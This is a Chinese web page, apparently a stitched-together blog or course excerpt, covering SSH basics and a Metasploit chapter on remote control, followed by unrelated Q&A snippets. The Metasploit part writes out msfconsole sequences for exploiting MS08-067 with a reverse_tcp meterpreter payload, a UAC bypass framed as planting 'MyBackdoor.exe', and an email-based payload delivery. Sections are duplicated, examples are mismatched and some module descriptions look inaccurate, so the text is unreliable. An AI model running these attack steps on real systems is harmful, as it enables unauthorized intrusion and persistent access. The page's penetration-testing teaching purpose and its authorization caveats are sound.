Linux ssh:远程控制的终极艺术,让服务器管理触手可及!
在Linux的神秘领域中,有一个让无数系统管理员和开发者着迷的命令——ssh。它以其无与伦比的安全性和便捷性,成为了远程服务器管理的终极艺术。今天,就让我们一起探索ssh的奥妙,学习如何使用这个强大的工具,让你对远程服务器的控制变得触手可及!
1.ssh:远程控制的终极艺术
ssh(Secure Shell)是一个用于安全访问远程计算机的网络协议,它通过加密的方式保证数据传输的安全性,是Linux系统中远程登录和管理的标准工具。
2. 基本用法:ssh的入门指南
3. 高级用法:ssh的特殊技巧
远程执行命令 :ssh user@hostname 'command',在远程服务器上执行单条命令并返回结果。持久化会话 :使用-L或-R选项创建端口转发,保持远程会话的持久连接。密钥登录 :通过SSH密钥对进行无密码登录,提高安全性和便利性。X11转发 :ssh -X user@hostname,开启X11转发,远程运行图形界面程序。4. 实战演练:ssh的实用案例
案例1 :通过非标准端口连接到远程服务器。ssh -p 10022 user@hostname案例2 :在远程服务器上执行特定命令并获取结果。ssh user@hostname 'ls -l /path/to/directory'案例3 :使用SSH密钥对实现无密码登录。ssh -i /path/to/private_key user@hostname案例4 :开启X11转发,远程运行图形界面程序。ssh -X user@hostname5.ssh与安全性
ssh提供了多种安全特性,包括数据加密、身份验证和端口转发,确保了远程会话的安全性。
6. 结语:精通ssh,成为Linux远程管理的大师
通过本文的学习,你已经掌握了ssh的基本和高级用法。现在是时候将这些知识应用到实际工作中,让你的Linux远程管理更加安全和高效。
不要犹豫,立即开始你的ssh学习之旅,精通ssh,成为Linux远程管理的大师,让你的服务器管理触手可及!
注意 :本文中的命令和示例仅供参考,实际使用时请根据你的具体需求和系统环境进行调整。享受ssh带来的便利,让你的远程服务器管理更加轻松。
远程控制
预计更新
## 第一章:Metasploit 简介
- Metasploit 是什么
- Metasploit 的历史和发展
- Metasploit 的组成部分
## 第二章:Kali Linux 入门
- Kali Linux 简介
- Kali Linux 安装和配置
- 常用命令和工具介绍
## 第三章:Metasploit 基础
- Metasploit 的基本概念
- Metasploit 架构和工作原理
- Metasploit 的安装和配置
## 第四章:信息收集
- 信息收集的重要性
- 扫描技术和工具介绍
- 如何使用 Metasploit 进行信息收集
## 第五章:漏洞扫描与利用
- 漏洞扫描的原理和方法
- Metasploit 的漏洞扫描和利用模块
- 常见漏洞的利用方法和技巧
## 第六章:远程控制
- 远程控制的原理和方法
- Metasploit 的远程控制模块
- 如何使用 Metasploit 进行远程控制
## 第七章:社会工程学攻击
- 社会工程学攻击的原理和方法
- Metasploit 的社会工程学模块
- 如何使用 Metasploit 进行社会工程学攻击
## 第八章:漏洞开发
- 漏洞开发的基本原理
- Metasploit 的漏洞开发模块
- 如何使用 Metasploit 进行漏洞开发
## 第九章:Metasploit 高级应用
- Metasploit 的高级应用技巧和方法
- 如何使用 Metasploit 进行信息窃取、渗透测试等高级操作
## 第十章:Metasploit 案例分析
- 一些真实的 Metasploit 攻击案例分析和总结
- 对于 Metasploit 使用者的建议和注意事项
## 第十一章:未来展望
- Metasploit 的未来发展趋势
- Metasploit 的优缺点及其在安全领域中的作用
## 第六章:远程控制
- 远程控制的原理和方法
- Metasploit 的远程控制模块
- 如何使用 Metasploit 进行远程控制
远程控制的原理和方法
远程控制是指通过网络远程控制另一台计算机或设备的操作过程。它通常用于管理和监控远程主机,或在有需要时对其进行支持或维护。本文将介绍远程控制的原理、方法和相关技术。
一、远程控制的原理
远程控制的原理是通过网络连接,在管理员端和客户端之间建立一个虚拟通道,使管理员可以实时地远程操纵客户端计算机。这个虚拟通道可以通过Internet或专用网络建立,这取决于企业或组织的需求和安全要求。
管理员端和客户端通常使用一个特定的应用程序来建立连接,以便管理员可以查看客户端屏幕,并与其键盘和鼠标进行交互。管理员可以通过远程控制软件执行各种任务,如文件传输、软件安装、升级等操作。
二、远程控制的方法
远程控制有多种方法,包括以下几种主要方法:
1. 远程桌面协议(RDP)
远程桌面协议是一种由微软开发的协议,可以让用户通过局域网或Internet远程访问Windows操作系统上的计算机。管理员可以使用Windows自带的远程桌面程序连接到另一台Windows计算机,并在其上执行各种任务。
2. Virtual Network Computing (VNC)
Virtual Network Computing 是一种远程桌面应用程序,可以在不同操作系统之间进行远程控制。 VNC允许管理员使用键盘和鼠标来控制远程计算机的屏幕,并且可以传输文件和剪贴板内容。
3. 控制终端协议(Telnet)
Telnet是一种基于文本的网络协议,可以通过远程登录到其他计算机或设备。它允许管理员通过命令行界面控制远程计算机,并执行各种任务,如更改设置、运行脚本等。
4. Secure Shell (SSH)
Secure Shell是一种加密的网络协议,可以建立安全的远程连接。管理员可以使用SSH协议连接到远程计算机,并在其中运行命令、编辑文件等。
5. 远程执行(Rexec)
Rexec是一种远程执行协议,可以通过网络连接到其他计算机或设备,并在其中运行命令或脚本。
6. 远程过程调用(RPC)
RPC是一种远程调用协议,可以让一个程序在另一个计算机上运行一个过程或函数。
7. 远程Shell(Rsh)
Remote Shell是一种远程访问协议,可以在多个计算机之间传输命令和数据。
以上方法都可以实现远程控制,但各自也有优缺点,选择应根据实际情况和需求进行考虑。
三、远程控制的技术
除了上述方法外,还有一些技术可以增强远程控制的安全性和可靠性。以下是其中一些常见的技术:
1. 加密
加密是通过使用密码来保护信息的安全性。远程控制软件通常使用加密技术来防止黑客攻击或窃取敏感信息。
2. 防火墙
防火墙是一种网络安全设备,可以监控网络流量并阻止未经授权的访问。它可以通过限制对某些端口的访问来保护计算机免受攻击,同时也可以控制对远程控制软件的访问,以确保只有受信任的用户可以使用。
3. 虚拟专用网络 (VPN)
虚拟专用网络是一种通过加密隧道连接到远程网络的安全通信机制。它可以使管理员在公共互联网上建立安全的连接,并保护与客户端通信的数据免受黑客攻击和窃取。
4. 双因素身份验证
双因素身份验证要求用户提供两个或多个身份验证因素(如密码和指纹),以确认其身份。这种方法可以增强远程控制的安全性,减少非法访问或攻击的可能性。
5. 日志记录和审计
日志记录和审计可以记录并跟踪远程控制操作的历史记录。这可以帮助管理员监控用户活动,识别潜在的安全问题,并及时采取措施加以解决。
6. 隔离网络
隔离网络可以将远程控制计算机与其他计算机物理隔离。这可以减少黑客攻击或恶意代码传播的风险,并增强系统的安全性。
四、远程控制的应用场景
远程控制可以应用于以下场景:
1. 远程支持和维护
管理员可以使用远程控制软件,远程地访问客户端计算机,并提供技术支持和故障排除。这可以节省时间和成本,并提高客户满意度。
2. 远程监控和管理
管理员可以使用远程控制软件检查并监控远程计算机的状态,并执行必要的管理任务。这可以提高系统的可靠性和安全性。
3. 远程培训和教育
远程控制可以用于远程培训和教育,例如通过屏幕共享来演示如何完成某项任务或操作某个软件程序。
4. 远程办公
远程控制可以使员工在不同地点的计算机上工作,并实现远程协作。这可以提高工作效率和灵活性。
5. 远程数据中心管理
远程控制可以用于管理和监控位于远程数据中心的服务器和网络设备。这可以提高数据中心的可靠性和安全性。
总之,远程控制技术已经成为现代企业和组织中不可或缺的一部分。了解远程控制的原理、方法和相关技术,建议管理员在选择远程控制软件时仔细考虑其适合的场景和安全性要求,以确保系统的可靠性和安全性。
Metasploit 的远程控制模块
Metasploit是一款用于渗透测试的开源框架,具有强大的漏洞利用和渗透测试功能。Metasploit包含了数百个模块,其中远程控制模块是其最为重要和基础的模块之一。本文将对Metasploit远程控制模块进行详细介绍。
一、Metasploit概述
Metasploit是一款由Rapid7公司开发的开源安全工具,旨在帮助安全专业人员发现和利用网络中的漏洞。Metasploit可以用于各种操作系统和平台,并提供了许多功能强大的工具和模块。
Metasploit框架包括三个主要组件:
1. msfconsole: Metasploit的命令行界面,可以使用命令来执行渗透测试任务。
2. msfvenom: Metasploit的负载生成器,可以生成各种类型的恶意代码。
3. msfdb: Metasploit的数据库,可用于存储渗透测试结果和其他信息。
二、Metasploit的远程控制模块
Metasploit的远程控制模块是Metasploit框架中最重要和基础的模块之一。远程控制模块是一种利用漏洞的方法,可以通过向目标计算机发送特殊的数据包来控制该计算机。远程控制模块可以用于执行各种任务,如获取敏感信息、执行命令、上传文件等。
Metasploit的远程控制模块主要分类为三种类型:
1. 漏洞利用模块
漏洞利用模块是Metasploit中最常用的远程控制模块之一。它们被设计用于利用目标计算机上已知的安全漏洞,以获得对该计算机的访问并执行命令或上传文件。漏洞利用模块可以根据目标计算机的操作系统和应用程序类型进行分类,例如:Windows漏洞利用模块、Linux漏洞利用模块等。
漏洞利用模块通常需要提供目标计算机的IP地址、端口号和漏洞的详细信息,并选择合适的负载类型。负载类型决定了实际执行的代码类型,例如反向Shell、Meterpreter Shell等。
2. 后门模块
后门模块是一种能够在目标计算机上创建并保持持久性的远程控制模块。它们被设计用于在目标计算机上创建隐藏的用户帐户、添加新的服务、修改注册表项等操作,以确保攻击者在目标计算机上具有持久的访问权限。
后门模块通常需要提供目标计算机的用户名和密码,并选择合适的负载类型。负载类型通常与漏洞利用模块相同,决定了实际执行的代码类型。
3. 社会工程学攻击模块
社会工程学攻击模块是一种能够在目标计算机上创建并保持持久性的远程控制模块。它们被设计用于欺骗用户,使其执行恶意代码或提交敏感信息。社会工程学攻击模块可以通过电子邮件、短信、社交媒体等方式进行传播。
社会工程学攻击模块通常需要提供欺骗信息的内容和格式,并选择合适的负载类型。负载类型通常与漏洞利用模块相同,决定了实际执行的代码类型。
三、Metasploit远程控制模块的使用
Metasploit的远程控制模块使用非常简单,只需要在msfconsole中输入相应的命令即可。以下是一些常见的使用示例:
1. 使用漏洞利用模块
首先,需要确定目标计算机上存在的漏洞类型和版本信息,可以使用nmap或其他端口扫描工具来完成。然后,在msfconsole中选择相应的漏洞利用模块,并设置目标计算机的IP地址和端口号,最后运行exploit命令。
例如,在Windows 7系统上尝试利用MS08-067漏洞进行攻击,可以在msfconsole中运行以下命令:
```
use exploit/windows/smb/ms08_067_netapi
set RHOST <target IP>
set RPORT 445
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <local IP>
set LPORT <local port>
exploit
```
2. 使用后门模块
后门模块通常需要提供目标计算机的用户名和密码,以及要在目标计算机上创建的后门名称。在msfconsole中选择相应的后门模块,设置目标计算机的IP地址、用户名、密码和后门名称,最后运行exploit命令。
例如,在Windows 7系统上创建一个名为MyBackdoor的后门,可以在msfconsole中运行以下命令:
```
use exploit/windows/local/bypassuac_eventvwr
set SESSION <session id>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <local IP>
set LPORT <local port>
set EXENAME MyBackdoor.exe
exploit
```
3. 使用社会工程学攻击模块
社会工程学攻击模块通常需要提供欺骗信息的内容和格式,并选择合适的负载类型。在msfconsole中选择相应的社会工程学攻击模块,设置欺骗信息和负载类型,最后运行exploit命令。
例如,在通过电子邮件进行传播的情况下,可以在msfconsole中运行以下命令:
```
use auxiliary/server/email/generic
set FROM_EMAIL <from email address>
set TO_EMAIL <to email address>
set SUBJECT <email subject>
set BODY <email body>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <local IP>
set LPORT <local port>
run
```
四、安全措施
Metasploit远程控制模块是一种非常强大和有效的渗透测试工具,但也存在一些潜在的风险。为了确保安全性,应该采取以下措施:
1. 仅在合法授权范围内使用Metasploit。
2. 在使用Metasploit之前,应对目标计算机进行充分的准备和测试。
3. 确保Metasploit的版本是最新的,并及时更新。
4. 在使用Metasploit时,应在安全环境中运行,例如在虚拟机中。
5. 在使用漏洞利用模块时,应使用公开已知漏洞,而不是未公开漏洞。
6. 确保Metasploit的使用符合当地法律和规定。
总之,Metasploit的远程控制模块是一种非常有用的渗透测试工具,可以帮助安全专业人员识别并利用网络中的漏洞。但它也存在潜在的风险,需要采取适当的安全措施来确保其安全性。
五、常见问题
1. Metasploit远程控制模块是否合法?
Metasploit本身是一个辅助安全测试的工具,只能在合法授权范围内使用。如果使用Metasploit进行非法活动,将可能导致无法挽回的法律后果。
2. Metasploit远程控制模块如何确定目标计算机的漏洞信息?
通常可以使用端口扫描工具(如nmap)来确定目标计算机开放的端口和服务类型。然后可以使用Metasploit中的漏洞利用模块来确认是否存在可利用的漏洞。
3. Metasploit远程控制模块是否支持跨平台?
Metasploit框架可以运行在各种操作系统和平台上,并提供了许多跨平台的远程控制模块。但是,一些特定操作系统或应用程序可能需要使用特定的漏洞利用模块。
4. 如何保护自己的计算机不被Metasploit攻击?
为了保护个人计算机不受Metasploit攻击,可以采取以下措施:
- 安装最新的操作系统和应用程序更新;
- 启用防火墙和入侵检测/防御技术;
- 限制对计算机和网络的访问权限;
- 使用强密码和双重身份验证;
- 不要打开不信任的电子邮件、链接和附件。
六、总结
Metasploit的远程控制模块是一种非常强大和有效的渗透测试工具,可以帮助安全专业人员发现和利用网络中的漏洞。远程控制模块通过利用漏洞、创建后门或进行社会工程学攻击来实现对目标计算机的控制。在使用Metasploit远程控制模块时,需要采取适当的安全措施以确保其安全性,并遵守当地法律和规定。
如何使用 Metasploit 进行远程控制
Metasploit是一款功能强大的渗透测试和漏洞利用框架,可以用于测试网络中的漏洞,并获得对目标计算机的远程控制权限。在本文中,我们将详细介绍如何使用Metasploit进行远程控制。
一、Metasploit基础
1. Metasploit概述
Metasploit是一个开源安全工具,旨在帮助安全专业人员发现和利用网络中的漏洞。Metasploit框架包括三个主要组件:msfconsole、msfvenom和msfdb。
2. Metasploit命令行界面
msfconsole是Metasploit的命令行界面,可以使用命令来执行渗透测试任务。在msfconsole中可以使用help命令查看可用的命令列表,也可以使用search命令搜索可用的模块。
3. Metasploit负载生成器
msfvenom是Metasploit的负载生成器,可以生成各种类型的恶意代码。通过msfvenom生成的负载可用于与Metasploit框架中的模块配合使用。
4. Metasploit数据库
msfdb是Metasploit的数据库,可用于存储渗透测试结果和其他信息。msfdb还可以与其他应用程序集成,并提供RESTful API接口。
二、远程控制概述
Metasploit的远程控制模块是Metasploit框架中最重要和基础的模块之一。远程控制模块是一种利用漏洞的方法,可以通过向目标计算机发送特殊的数据包来控制该计算机。
Metasploit的远程控制模块主要分类为三种类型:
1. 漏洞利用模块
漏洞利用模块是Metasploit中最常用的远程控制模块之一。它们被设计用于利用目标计算机上已知的安全漏洞,以获得对该计算机的访问并执行命令或上传文件。漏洞利用模块可以根据目标计算机的操作系统和应用程序类型进行分类,例如:Windows漏洞利用模块、Linux漏洞利用模块等。
2. 后门模块
后门模块是一种能够在目标计算机上创建并保持持久性的远程控制模块。它们被设计用于在目标计算机上创建隐藏的用户帐户、添加新的服务、修改注册表项等操作,以确保攻击者在目标计算机上具有持久的访问权限。
3. 社会工程学攻击模块
社会工程学攻击模块是一种能够在目标计算机上创建并保持持久性的远程控制模块。它们被设计用于欺骗用户,使其执行恶意代码或提交敏感信息。社会工程学攻击模块可以通过电子邮件、短信、社交媒体等方式进行传播。
三、使用Metasploit进行远程控制
1. 使用漏洞利用模块
首先,需要确定目标计算机上存在的漏洞类型和版本信息,可以使用nmap或其他端口扫描工具来完成。然后,在msfconsole中选择相应的漏洞利用模块,并设置目标计算机的IP地址和端口号,最后运行exploit命令。
例如,在Windows 7系统上尝试利用MS08-067漏洞进行攻击,可以在msfconsole中运行以下命令:
1. 打开msfconsole
在操作系统中打开终端,并输入以下命令以启动msfconsole:
```
msfconsole
```
2. 搜索漏洞利用模块
使用Metasploit的search命令来搜索MS08-067漏洞利用模块:
```
search ms08-067
```
3. 选择漏洞利用模块
选择一个适合目标计算机的漏洞利用模块,例如exploit/windows/smb/ms08_067_netapi。
```
use exploit/windows/smb/ms08_067_netapi
```
4. 设置目标计算机的IP地址和端口号
设置目标计算机的IP地址和端口号:
```
set RHOST <target IP>
set RPORT 445
```
5. 配置负载类型
设置要使用的负载类型。Metasploit框架支持多种负载类型,包括meterpreter、shell和VNC等。这里我们选择meterpreter类型。
```
set PAYLOAD windows/meterpreter/reverse_tcp
```
6. 配置本地监听器
设置本地监听器的IP地址和端口号。
```
set LHOST <local IP>
set LPORT <local port>
```
7. 运行exploit命令
运行exploit命令开始攻击,如果一切顺利,可以获得对目标计算机的访问权限,并执行各种命令。
```
exploit
```
2. 使用后门模块
后门模块通常需要提供目标计算机的用户名和密码,以及要在目标计算机上创建的后门名称。在msfconsole中选择相应的后门模块,设置目标计算机的IP地址、用户名、密码和后门名称,最后运行exploit命令。
例如,在Windows 7系统上创建一个名为MyBackdoor的后门,可以在msfconsole中运行以下命令:
1. 使用漏洞利用模块
首先,需要确定目标计算机上存在的漏洞类型和版本信息,可以使用nmap或其他端口扫描工具来完成。然后,在msfconsole中选择相应的漏洞利用模块,并设置目标计算机的IP地址和端口号,最后运行exploit命令。
例如,在Windows 7系统上尝试利用MS08-067漏洞进行攻击,可以在msfconsole中运行以下命令:
```
use exploit/windows/local/bypassuac_eventvwr
set SESSION <session id>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <local IP>
set LPORT <local port>
set EXENAME MyBackdoor.exe
exploit
```
3. 使用社会工程学攻击模块
社会工程学攻击模块通常需要提供欺骗信息的内容和格式,并选择合适的负载类型。在msfconsole中选择相应的社会工程学攻击模块,设置欺骗信息和负载类型,最后运行exploit命令。
例如,在通过电子邮件进行传播的情况下,可以在msfconsole中运行以下命令:
```
use auxiliary/server/email/generic
set FROM_EMAIL <from email address>
set TO_EMAIL <to email address>
set SUBJECT <email subject>
set BODY <email body>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <local IP>
set LPORT <local port>
run
```
四、安全措施
Metasploit远程控制模块是一种非常强大和有效的渗透测试工具,但也存在一些潜在的风险。为了确保安全性,应该采取以下措施:
1. 仅在合法授权范围内使用Metasploit。
2. 在使用Metasploit之前,应对目标计算机进行充分的准备和测试。
3. 确保在使用Metasploit的过程中不会给目标计算机造成损害。
4. 使用最新版本的Metasploit软件,并及时更新漏洞利用模块和负载类型。
5. 采取适当的安全措施,如启用防火墙、入侵检测/防御技术、限制对计算机和网络的访问权限、使用强密码和双重身份验证等。
6. 遵守当地法律和规定,不要进行非法活动。
7. 在使用Metasploit之前,请务必获得经过授权的许可证,以避免任何法律后果。
五、总结
Metasploit是一个功能强大的渗透测试和漏洞利用框架,可以帮助安全专业人员发现和利用网络中的漏洞。Metasploit的远程控制模块是一种利用漏洞的方法,可以通过向目标计算机发送特殊的数据包来控制该计算机。使用Metasploit进行远程控制需要选择合适的远程控制模块,设置目标计算机的IP地址和端口号,并根据需要配置负载类型和本地监听器。在使用Metasploit进行远程控制时,需要采取适当的安全措施以确保其安全性,并遵守当地法律和规定。
更多精彩:「链接」
相关问答
手机上如何远程控制Linux服务器?
这里介绍3个手机软件,分别是JuiceSSH、Termius和Termux,这3个软件都可以实现远程控制Linux服务器(相当于手机SSH客户端),而且使用起来都非常方便,下面我简...这...
如何远程控制虚拟机?
远程控制虚拟机可以通过以下步骤完成:1.安装虚拟机软件:选择一款适合自己的虚拟机软件,如VMware、VirtualBox、Hyper-V等,按照软件的说明进行安装。2....
如何看待手机电脑远程控制管理呢?
我认为手机电脑远程控制管理是非常好的功能。旧的手机、破的手机,通通不用拿去换不锈钢脸盆了,可以留在家里做摄像头监控利用起来。有的时候父母在家遇到一些...
Teamviewer战略失误后,远程控制软件谁能扛起大旗?
向日葵这里我倒不是打广告,但是向日葵算是我目前用过的远程控制软件里面比较好用的一个了。Teamviewer虽然很好用,但是自从Teamviewer对免费用户的各种阻碍之...
mac怎样远程控制window电脑-桃樱之的回答-懂得
VNC(VirtualNetworkComputing)是虚拟网络计算机的缩写。VNC是一款优秀的远程控制工具软件,由著名的AT&T的欧洲研究实验室开发的。VNC是在基于UNIX和...
linux系统可以和windows系统通过wifi连接吗?
1.可以通过wifi连接。2.因为linux系统和windows系统都支持wifi连接功能,只要两个系统都连接到同一个wifi网络,就可以实现彼此之间的连接。3.通过wifi连接,l...
怎么用手机远程控制电脑开关机?,远程开关电脑上档次么??
[回答]冬天可以愉快的在被窝里玩耍了。n远程开关机,方便了我们工作、通讯和生活,给我们带来了很多的便利,而向日葵更是让这些便利更简单,如果您也心动想尝...
有没有好用免费的远程控制软件,手机可用。teamviewer除外?
远程控制神器——ToDesk支持版本:IOS、Linux、Windows、Andriod、MacOS使用用途:一款免费的专业远程控制、远程办公软件,可轻松适用于各种远程办公。在主控...
如何远程控制家里的电脑或服务器?
很多时候我们不在家里,但要控制家里的电脑,这种场景还是会经常遇到的。这种远程控制是可以实现的,而且技术方案很多。下面我将几种常见方案给大家介绍一下:1...
向日葵远程控制软件和teamviewer哪个好用?
在使用上比向日葵要流畅,不卡。操作容易。最重要的是,在电脑上,一次可以连接很多用户,同时进行远程控制及文件传输。Treamviewer在使用中,如果系统判断用...操...